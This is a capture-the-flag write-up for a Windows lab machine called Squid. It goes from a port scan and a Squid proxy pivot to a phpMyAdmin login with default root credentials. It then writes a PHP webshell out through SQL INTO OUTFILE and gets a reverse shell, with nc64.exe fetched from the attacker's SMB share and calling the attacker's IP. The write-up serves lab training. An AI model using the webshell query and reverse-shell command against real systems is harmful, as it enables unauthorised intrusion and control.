> For the complete documentation index, see [llms.txt](https://rouvin.gitbook.io/ibreakstuff/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouvin.gitbook.io/ibreakstuff/writeups/proving-grounds-practice/windows/squid.md).

# Squid

## Gaining Access

Nmap scan:

```
$ nmap -p- --min-rate 3000 -Pn 192.168.233.189
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-30 15:29 +08
Nmap scan report for 192.168.233.189
Host is up (0.17s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE
3128/tcp open  squid-http
```

Only one port is open.

### Squid Proxy -> FoxyProxy

The port was a Squid Proxy instance. When visited in a browser, this is all we see:

<figure><img src="/files/YVmH68Thuj3Vz3K2ag7Y" alt=""><figcaption></figcaption></figure>

Since this is a proxy service, it might be the gateway that we need to access the services running on the machine itself. To scan the machine, we can include this line in our `/etc/proxychains4.conf` file:

```
socks5 192.168.233.189 3128
```

Afterwards, we can use `proxychains` to scan the machine again to find more ports that are open, but this takes far too long. Instead, we can use FoxyProxy to attempt to view some interesting ports. I tried with a few ports like 80, 443 and 8080 for websites, and found a service on port 8080.

<figure><img src="/files/mZm6nSDJcPyZY9HFwqSw" alt=""><figcaption></figcaption></figure>

### Default Creds -> SQL RCE

There's a PHPMyAdmin instance present on the page, and we can login using `root` as the username with no password.

<figure><img src="/files/9q7VnijWuezw9NpPYRtX" alt=""><figcaption></figcaption></figure>

Since this is already the administrative interface, we can get a shell by creating a database and then executing some SQL commands in it via the web SQL interpreter.

<figure><img src="/files/47h7GNpF49asw3nyezY8" alt=""><figcaption></figcaption></figure>

Afterwards, we can select this database and head to the QUERY tab:

<figure><img src="/files/z6n1t1uhvdHqhitFuR2d" alt=""><figcaption></figcaption></figure>

We can test it with any query and see that it is indeed processing SQL queries:

<figure><img src="/files/mWoNOaYUkXBsgzGF5oZ2" alt=""><figcaption></figcaption></figure>

Since we can submit queries, we can also write files into the file system of the machine. I wanted to write a basic PHP webshell, but this means we need to know the webroot file. Very conveniently, there's a `phpinfo` page on the main Wampserver page.

There, we can find the `DOCUMENT_ROOT`:

<figure><img src="/files/ZRtE1M1kqJsridd0BEIB" alt=""><figcaption></figcaption></figure>

We can then use this query to write a webshell onto the machine:

```sql
SELECT '<?php system($_GET["cmd"]); ?>' into outfile "C:\\wamp\\www\\backdoor.php"
```

<figure><img src="/files/thLh74B5OuTVIg3JDeVh" alt=""><figcaption></figcaption></figure>

Afterwards, we can test our RCE:

<figure><img src="/files/QYzVvXStpfUzvX8GJA94" alt=""><figcaption></figcaption></figure>

Great! No all we need to do is get a reverse shell as the user. By setting up a SMB server on our machine with `nc64.exe` within the directory, we can send this to get a shell:

```
http://192.168.233.189:8080/backdoor.php?cmd=\\192.168.45.161\share\nc64.exe+-e+cmd.exe+192.168.45.161+4444
```

<figure><img src="/files/qMceBg6bc7ibXG6FSEB8" alt=""><figcaption></figcaption></figure>

There is no privilege escalation, because we have successfully gotten a SYSTEM shell.

{% hint style="info" %}
This machine was changed since I last did it in 2022. My older writeups show that the machine was running as LOCAL SYSTEM instead of the SYSTEM user.

The old box would give us intial access with the LOCAL SYSTEM user without any privileges, and we had to use either schtasks or FullPowers.exe to give us a shell with the full privileges of a LOCAL SYSTEM user that includes SeImpersonatePrivilege, which we can then use PrintSpoofer.exe or JuicyPotato.exe to get a SYSTEM shell.
{% endhint %}
